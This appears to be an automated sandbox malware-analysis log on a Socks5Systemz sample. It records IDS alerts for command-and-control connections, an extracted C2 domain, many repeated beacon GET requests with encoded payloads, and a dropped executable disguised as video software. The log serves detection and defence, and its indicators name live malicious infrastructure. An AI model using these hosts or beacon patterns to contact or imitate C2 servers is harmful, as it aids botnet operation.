                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49926 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49881 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49881 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49861 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49861 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49894 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49894 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49798 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49803 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49803 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49833 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49833 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49778 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49778 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49922 -> 147.45.126.31:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49922 -> 147.45.126.31:80
                    Source: Malware configuration extractorURLs: ejvphud.ua
                    Source: global trafficTCP traffic: 192.168.2.4:49738 -> 46.8.225.74:2023
                    Source: Joe Sandbox ViewASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c443db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfb12c5e894923d HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                    Source: unknownUDP traffic detected without corresponding DNS query: 91.211.247.248
                    Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exeCode function: 4_2_02DB72AB Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_strtok,_swscanf,_strtok,_free,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_sprintf,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_free,4_2_02DB72AB
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c443db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfb12c5e894923d HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1Host: ejvphud.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
